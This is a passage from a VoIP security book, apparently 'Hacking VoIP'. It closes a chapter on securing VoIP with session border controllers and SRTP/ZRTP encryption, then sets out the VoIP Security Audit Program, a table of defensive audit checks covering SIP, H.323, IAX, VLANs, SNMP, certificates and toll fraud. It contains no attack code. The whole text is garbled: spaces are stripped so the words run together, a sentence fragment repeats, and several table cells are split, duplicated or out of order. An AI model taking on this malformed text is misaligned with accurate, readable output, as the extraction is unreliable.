mediaports,manyorganizationsandvendorschooseastaticportortwobasedontheiruniquedeployment.AnothermethodofmakingorganizationshappierwithVoIPistheuseofSessionBorderControllers(SBCs).SBCsaredevicesusedtomanagesignaling(SIPandH.323)andmediacommunication(RTP)betweenendpoints,withNATfunctionality.ThedevicesusuallysitoutsidethefirewallintheDMZorexternalnetworksotheycansetup,communicate,andteardowncallsonbehalfofendpoints.SBCsusuallyspeaktoagatekeeper(H.323)orProxyserver(SIP)insidethefirewallontheinternalnetwork.Inmostsituations,afirewallruleiscreatedallowingthesetwoentitiestotalktoeachother,butnothingelse.Hence,onlyoneruleiscreatedinthefirewall,andallendpointsspeaktotheinternalH.323gatekeeperorSIPProxyserver.TheinternalH.323gatekeeperorSIPProxyserverisallowedtotalktotheSBC,whichgoesoutandmakestheconnectionwiththeremoteendpointontheuser'sbehalf.Similarly,thereversecommunicationrunsthroughtheexternalSBC,whichisthenallowedtotalkonlytotheinternalH.323gatekeeperorSIPProxyserver.TheinternalH.323gatekeeperorSIPProxyserverthenpassesthepacketstothecorrectendpoint.Figure9-6showsanexampleofthearchitecture.
SummarySecuringVoIPnetworksisnotaneasytask,butitisanimportantone.Whiletheprocesscanbecumbersome,deployingSIPS,SRTP,orZRTPcandrasticallyreducetheattacksurfaceonaVoIPnetwork.Theabilitytoprovideencryptionatboththesessionlayerandmedialayercanensurethatusersarereceivingthesamelevelofsecurityas,ifnotmorethan,theywouldhaveifusingtraditionalphonesystems.Furthermore,sensitiveaudiocommunication,frominternalcallsregardingstockinformationtoprivacyconcernsaboutpersonaldata,mightbemandatedtobeassecureasanyotherentity(e.g.,filesandfolders)onthenetworkholdingthesametypeofinformation.Finally,softphonesusingSRTPcandeploynewtechnologiessuchasZfone,allowingusersadditionalsecurityonsoftphonesthatmightnotprovideitnatively.
Figure9-6.SBCwithVoIPinfrastructure
TLSisabasicrequirementforwebcommunication;however,italsohashadmorethan10yearsofinfrastructurebuiltintoit.Forexample,arootchaintreethatisbuiltintoInternet
Forexample,arootchaintreethatisbuiltintoInternetExplorerandFirefoxmakesitveryeasytobuildapublicnetworkusingTLS.Unfortunately,hardphonesdonothavethatsameluxury.Furthermore,SRTPandZRTPsolvemanyissues,butthelackofsupportandinteroperabilitybetweenvendorsstillkeepsitfrombeinganeasyplug-and-playdeployment.Also,firewallsthatusuallyhelpwithnetworkprotocolsactuallyaddtotheissue,astheirsupportforVoIPprotocolsismarginalatbest.ThebumpyroadthatissecuringVoIPneedstobecompleted.Anyorganizationthatiswillingtoaccepttherisksmightaswellsharetheirvoicemailpasswordswitheveryemployeeofthecompany.Thenagain,avoicemailpasswordisprobablynothingwhencomparedwiththecreditcardnumbers,personalhealthinformation,orsocialsecuritynumbersthatarecontinuallybeingtransmittedonvoicecalls.Securedesigns,theuseofencryptionatthesessionlayerandmedialayer,andintegrityprotectionmustbestaplesofVoIPifitdoesnotwanttobetheweakestlinkintheITnetwork.Furthermore,integrityandconfidentialityhavetraditionallybeenassumedinvoicecommunication,andtheyshouldhavethatsamestatusinVoIPdevicesaswell.
Chapter10.AUDITINGVOIPFORSECURITYBESTPRACTICESAuditingVoIPnetworksisanimportantstepinsecuringthem.InmostVoIPnetworks,therearemanymovingpartsthatmayhaveanegativeeffectonsecurity.Forexample,theuseofstrongsessionsecuritymaybenegatedbypoormediasecurity.Furthermore,encryptedmediacommunicationmaybeinvalidatedifsessionsetupprotocolssendtheencryptionkeyincleartext.EachaspectofVoIP,includingthenetwork,devices,software,andprotocols,shouldbeanalyzedintermsofsecurity.Apoorsecuritysettingononeentitycanaffectthestrongsecurityofothers.AuditingVoIPnetworks,identifyingsecuritygaps,andthenimplementingsolutionsthatmitigateexposedriskisoftenthebestapproach.AuditingVoIPnetworksforsecurityisagoodfirststepinunderstandingtheriskofthenetworkinfrastructureanditscomponents.Ifgapsarenotidentifiedinagivennetwork,remedyingissues,trackingprogress,andmovingtowardastrongsecuritymodelforvoicecommunicationwillbeverydifficult.ThischapterwillfocusonauditingVoIPnetworksforpropersecuritysettingsandcontrols.Additionally,thebestpracticesforsecuringVoIPentitieswillbediscussed.
VoIPSecurityAuditProgramVoIPSecurityAuditProgram(VSAP)version1.0isamethodologycreatedbytheauthorinordertobegintheprocessofdevelopingaclearstandardformeasuringVoIPsecuritysothatorganizationscanunderstandhowstrongtheirVoIPnetworksare.Furthermore,thestandardwillcreateabaselinetostartmeasuringVoIP.TheauthorwillcontinuetoupdateVSAPevenafterthebook'spublication.Additionally,aninteractiveversionofVSAPcanbedownloadedfromhttp://www.isecpartners.com/tools.html/.Afterauseranswers
thequestionsintheinteractiveversionofVSAP,itwilldisplaytheresultswithanoverallriskscorefortheVoIPnetwork.VSAPisorganizedlikeatypicalauditprogram,usingaquestion-and-answerformatwithdifferentlevelsofmeasurement,includingSatisfactory,Unsatisfactory,andMixed.ThefollowingtableshowsthecontentsofVSAP.Table10-1.VoIPAuditProgram
AuditTopic AuditQuestions AuditResults
SIPauthentication
SIPS,orSIPwrappedinaTLStunnel,shouldbeusedforsessionlayerprotectionwhenusingSIP.
HowissessionsetupauthenticationusedwithSIP?
Satisfactory:SIPwithSSL/TLSUnsatisfactory:StandardSIPdigestauthentication
SIPregister
SIPUserAgentshouldauthenticateREGISTERandINVITErequests.
AreSIPREGISTERandINVITErequestsauthenticated?
Satisfactory:SIPREGISTERandINVITErequestsareauthenticated.Unsatisfactory:SIPREGISTERandINVITErequestsarenotauthenticated.
H.225authentication
H.225wrappedinaTLStunnelshouldbeusedforsessionlayerprotectionsusingH.323.
HowissessionsetupauthenticationusedwithH.323?
Satisfactory:H.323withSSL/TLSUnsatisfactory:StandardH.323authenticationwiththeMD5hashofatimestampandpassword
H.225MD5authenticationtime
Tolimitreplayattacks,lowNTP
AretimestampsfromNTPserversthatareusedwith
Satisfactory:Timestampsaresetto15minutesor
Tolimitreplayattacks,lowNTPthresholdsshouldbeusedwithH.225MD5authentication.
usedwithH.225authenticationsetto15minutesorless?
aresetto15minutesorless.Unsatisfactory:Timestampsaresetto15minutesormore.
IAXauthentication
IAXwrappedinaTLStunnelshouldbeusedforsessionlayerprotectionwhenusingIAX.
HowissessionsetupauthenticationusedwithIAX?
Satisfactory:IAXwithSSL/TLSUnsatisfactory:StandardIAXauthenticationwiththeMD5hashofthepassword
ConcurrentSIP/IAX/H.323sessions
Donotallowconcurrentsessionswithasingleusernameandpassword(onesessionperaccount).
IsasingleusernameandpasswordallowedtoauthenticatemultipletimesfrommultipleendpointsorUserAgents?
Satisfactory:Asingleusernameandpasswordislimitedtoonlyonesuccessfulauthentication.Unsatisfactory:Asingleusernameandpasswordcanbeauthenticatedmanytimes.
Sessionlayerunregistration
Sessionprotocols,suchasSIP,H.323,andIAX,shouldrequireauthenticationtoun-registeranendpointorUserAgent.
IsauthenticationrequiredtounregisterSIP/H.323/IAXclients?
Satisfactory:AuthenticationisrequiredtounregisteranendpointorUserAgent.Unsatisfactory:Noauthenticationisrequired,butratherasimpleUNREGISTERpacketfromthenetworkdisconnectsclients.
LDAPoverSSL
IsLDAPoverSSLusedwith
Satisfactory:LDAPoverSSLisusedfortheVoIPendpointsorUserAgentsusingLDAP
IfH.323endpointsorSIPUserAgentsuseanLDAPstoreforauthentication,ensurethatLDAPoverSSLisenabledtoprotectauthenticationcredentials.
SSLusedwithendpointsorUserAgentswhoareauthenticatingtoanLDAPstore?
AgentsusingLDAPstores.Unsatisfactory:
LDAPoverSSLisnotusedfortheVoIPendpointsorUserAgentsusingLDAPstores.
Mediaencryption
Voicecommunicationshouldbeencryptedifitcontainsprivate,sensitive,orconfidentialinformation.
Voicecommunicationmustensureanadequatelevelofprivacy.Isthemedialayerencrypted?
Satisfactory:SRTP,AES,oranIPSectunnelisusedforallmediacommunication.Unsatisfactory:Noencryptionisusedonthemedialayer.
SRTPkeyexchange
WhenSRTPisused,thekeyexchangeshouldnottraversethenetworkincleartext.Hence,TLSshouldbeusedatalltimeswithSIPorH.323whenSRTPisenabled(otherwise,anysecurityenabledwithSRTPisnegated).
WhenSRTPisused,isTLSalsousedwiththesessionsetupprotocol,suchasSIPorH.323,toensurethatthekeyexchangedoesnottraversethenetworkincleartext?
Satisfactory:TLSisusedwithSIP/H.323incombinationwithSRTP.Unsatisfactory:TLShasnotbeenimplementedonSIP/H.323incombinationwithSRTP.
RTPentropy
RTPpacketsneedtocontainanadequatelevelofentropytohelppreventRTPinjectionattacks.Ensurethatthefull64-bitsoftheSSRC,sequencenumber,andtimestampuserandomvaluesratherthansequentialvalues.
HowisRTPentropyimplemented?
Satisfactory:TheRTPmediasessionusestrulyrandomvaluestopreventattackersfromeasilyguessingvalues.Unsatisfactory:Thetimestampstartswith0andincrementsbythelengthofthecodeccontent(160),thesequencestartswith0
sequencestartswith0andincrementsby1,andtheSSRCisafunctionoftime.
IAXmediacommunication
Voicecommunicationshouldbeencryptedifitcontainsprivate,sensitive,orconfidentialinformation.
Voicecommunicationmustensureanadequatelevelofprivacy.Isthemedialayerencrypted?
Satisfactory:SRTP,AES,oranIPSectunnelisusedforallmediacommunication.Unsatisfactory:Noencryptionisusedonthemedialayer.
E.164aliases
E.164aliasesshouldbeuniqueanddifficulttospooforenumerate.
AredefaultE.164aliasesused?
Satisfactory:UniqueandcustomizedE.164aliaseshavebeenenabled.Unsatisfactory:TherehasbeennochangetoE.164aliases.
DuplicateE.164aliashandling
Agatekeeper'sregistrationconflictpolicyshouldbesettoReject,whichwillpreventspoofedE.164aliasesfromoverwritinglegitimateendpoints.Itshouldbenotedthatwiththissetting,anattackercanperformaDenialofServiceattackonalegitimateendpoint,registerwiththegatekeeper,andpreventthelegitimateendpointfromregisteringwhenitcomesbackonline(becauseoftheRejectpolicy).EnsurethatDoSattacksonendpointsaremitigatedbeforesettingthepolicy.
Whatistheregistrationrejectpolicysetto?
Satisfactory:RegistrationrejectUnsatisfactory:Overwrite
Authentication/authorization
Satisfactory:AgivenusernameandpasswordcanbeusedwithonlyonespecificE.164alias.
AcompromisedE.164aliasshouldbeuselesswithoutthecorrespondingauthenticationinformation.
AreE.164aliasestiedtoasingleusernameandpassword?
onespecificE.164alias.Unsatisfactory:E.164aliasandH.323authenticationarenottiedtogether.Hence,agivenusernameandpasswordcanbeusedonanyauthorizedE.164alias.
E.164duplicateerrors
VagueerrormessagesforduplicateE.164aliasesshouldbeused.
WhenattemptingtoregisteranH.323endpointwithaduplicatealias,istheerrorduplicateAlias(4)senttotheuser(onthewire)oramoregenericerrormessage,suchassecurityDenial?
Satisfactory:Ageneric(securityDenial)errormessageissent(onthewire)whentwoendpointsregisterwiththesamealias.Unsatisfactory:duplicateAlias(4)isstillusedwhentwoendpointsattempttoregisterwiththesamealias.
802.1x
802.1x-compliantdevices,includingendpointsandUserAgents,shouldbeusedonVoIPnetworks.
Is802.1xsupportedonVoIPnetworks?
Satisfactory:802.1xisstrictlyusedonVoIPsubnetsandVLANs.Unsatisfactory:802.1xisnotusedonVoIPsubnetsandVLANs.
VLANusage
VLANsaregoodforsegmentationbutshouldnotbeusedasasecuritycontrolbecauseanattackercansimplyunplugaVoIPhardphonefromtheclosestEthernetjackandplugintotheVoIPnetworkwithhisorherPC.802.1xcanbeusedtoensurethatunauthorizedsystemsarenotconnectedtotheVoIPVLAN.
IstheVoIPVLANusing802.1x?
Satisfactory:TheVoIPVLANisusing802.1x.Unsatisfactory:TheVoIPVLANisnotusing802.1x.
VLAN.
ARPmonitoring
EnableARPmonitoringonallvideoconferencenetworkstodetectARPpollution/poisoningattacks.
IsARPmonitoringoccurringonVoIPsubnets/VLAN?
Satisfactory:ARPmonitoringisoccurringonallVoIPsubnets/LAN,specificallyforman-in-the-middleattacks.Unsatisfactory:NoARPmonitoringprocessesarecurrentlybeingused.
Networksegmentation
Whilenotasecuritycontrol,VoIPnetworksshouldbeseparatedfromdatanetworks.
AreVoIPnetworksonthesameVLANs/subnetsasdatanetworks?
Satisfactory:VoIPnetworksontheirownVLANs.Unsatisfactory:VoIPnetworkssharethesamenetworkasthedatanetwork.
In-band/out-of-bandmanagement
ManagementmethodsforVoIPdevicesshouldbeout-of-bandandmanagedfromasecureandtrustedmanagementnetwork.VoIPdevicesshouldnotbemanagedfromin-banddataconnections.
AreVoIPdevicesmanagedout-of-bandviaanisolatedmanagementnetwork?
Satisfactory:Out-of-banddevicemanagementviaamanagementnetworkorEncryptedin-banddevicemanagementviaamanagementnetworkUnsatisfactory:Out-of-bandmanagementviaanopeninternalnetworkorCleartextdevicemanagementoverin-bandnetworks
VoIPmanagementfiltering
VoIPdevicemanagementshouldbe
AreaccessfiltersplacedonVoIPdevices,filteringaccesstoonly
Satisfactory:Accessfiltersareused.
VoIPdevicemanagementshouldbelimitedtoauthorizedmachinesusingIPaddressandhostnamefilters.
toonlymanagementandauthorizednodes(viaIPaddressfiltersorhostnamefilters)?
filtersareused.Unsatisfactory:Access
filtersarenotused.
VoIPmanagementprotocols
Passwordauthenticationformanagementpurposesshoulduseencryptedprotocols.
Whatprotocolsarebeingusedformanagementandadministration?
Satisfactory:SSH,SSL(HTTPS),and/orSNMPv3Unsatisfactory:telnet,HTTP,and/orSNMPv1
SNMP
TheuseofSNMPv1isstronglydiscouraged.Ifitisabusinessrequirement,usedifficult-to-guesscommunitystringsandrestrictaccessviaafirewallorrouteraccesscontrollists.
IsSNMPv3usedorisSNMPv1usedviaasecurenetwork?
Satisfactory:SNMPv3isusedorSNMPv1isusedinanisolatedmanagementnetwork.Unsatisfactory:SNMPv1isusedviaaninternalnetwork.
Timestamp/date
Dateandtimestampinformationshouldbecurrentinordertoensuretheintegrityofalllogfiles.
AredateandtimestampinformationcorrectonallVoIPentities?
Satisfactory:Dateandtimearecorrect.Unsatisfactory:Dateandtimearenotcorrect.
Logging
AllVoIPdevicesshouldlogimportantactivitytothemanagementsoftware.Logsshouldbereviewedregularly.
Arecritical,informational,andseverelogsstored?
Satisfactory:Logsarestoredandreviewedonaregularbasis.Unsatisfactory:Logsarenotstoredorreviewedonaregularbasis.
HardphonePINs
PINsforhardphonesshouldbeuniqueandconsistofmorethanfourcharacters.
DoallVoIPhardphonescontainuniquePINvaluesthatconsistoffourtoeightcharacters?
Satisfactory:StrongPINsgreaterthanfourcharactersareinuse.Unsatisfactory:ShortPINs,whichareusuallythelastfourdigitsoftheuser'sphoneextension,areinuse.
Hardphonebootprocess
HardphonesshoulduseHTTPSforbootfilesoverthenetwork.
WhatprotocolsarebeingusedtotransferbootimagesfromthenetworktoVoIPhardphones?
Satisfactory:HTTPSisinuseforbootfiletransfer.Unsatisfactory:TFTPorHTTPisinuseforbootfiletransfer.
Tollfraudandabuse
OnVoIPdevices,enableserver-sidecontrolsthathelppreventtheabuseofthephonesystem.Forexample,createexplicitpermissionsonwhocanmakecallsoutbound,joinconferences,andmakeinternationaloutboundcalls.
Areserver-sidecontrolsenabledforallVoIPendpointsandUserAgents?
Satisfactory:Server-sidecontrolsforVoIPendpointsandUserAgentsaresettolimitorcontroltollfraudandabuse.Unsatisfactory:Noserver-sidecontrolsarebeingused.
AutoDiscovery
Gatekeepers,BorderControllers,andendpointsshouldhavestaticIPaddresseslistedonthem.
AreallAutoDiscoveryvaluessettooff(asamaliciousattackercanupdatethegatekeeperinformation)?
Satisfactory:AllexternalgatekeepershaveAutoDiscoveryoff.Unsatisfactory:ExternalgatekeepershaveAutoDiscoveryon.
SSLcertificates
Satisfactory:Non–self-
DevicesusingSSLforauthenticationormediacommunicationshouldusestrongSSLcertificates.
WhattypesofSSL/TLScertificatesarebeingused?
Satisfactory:Non–self-signedSSLv3/TLSv1withstrongciphersuitesonlyUnsatisfactory:Self-signedSSLcertificateswithSSLv2orbelowwitheitherlow,medium,orhighciphersuites
SSLcertificateschecking
Incorrect,CNamemismatch,orexampleSSLcertificatestoandfromVoIPdevicesareautomaticallydisabled.
WhatisthebehaviorofVoIPdeviceswhenanincorrect,mismatched,expired,orself-signedSSLcertificateisidentifiedduringsessionormediaconnection?
Satisfactory:Connectionisimmediatelydropped.Unsatisfactory:Userispromptedforactionbasedonhisorherjudgment.
DHCP/DNSservers
SupportingVoIPinfrastructureservices,suchasDHCPandDNS,shouldusededicatedresourcesthatarenotsharedwithuseranddatanetworks.
ArededicatedDNSandDHCPserversusedforVoIPnetworks?
Satisfactory:VoIPnetworkscontainadedicatedDHCPandDNSserver.Unsatisfactory:VoIPnetworksshareDHCP/DNSwithdataandusernetworks.
SummaryVoIPnetworksareacollectionofsoftware,hardware,infrastructureservices,andprotocols.Thischapterdiscussedanewstandardauditprogram(VSAP)forconsistentlymeasuringVoIPintermsofsecurity.TheauditprogramshowshowtoauditVoIPentitiesforstandardsecuritypractices.AuditingVoIPnetworksanddevicesisthebestmethodofidentifyingthegapsinaVoIPnetwork,intermsofavailabilityandsecurity,andwillallowenduserstobegintheprocessofmitigatinganyidentifiedsecuritygaps.Additionally,compliancebodiescanuseVSAPtodemonstratethestrengthsandweaknessesofaparticularentity.AuditingVoIPnetworkswillhelpVoIPadministratorsandsecurityarchitectsmeasuresecurity.Itwillinformallinterestedbodiesthatappropriatecontrolsareinplaceorthatthereisanactionplantoputtheminplace.
COLOPHONThefontsusedinHackingVoIPareNewBaskerville,Futura,andDogma.ThebookwasprintedandboundatMalloyIncorporatedinAnnArbor,Michigan.ThepaperisGlatfelterSpringForge60#SmoothAntique,whichiscertifiedbytheSustainableForestryInitiative(SFI).ThebookusesaRepKoverbinding,whichallowsittolayflatwhenopen.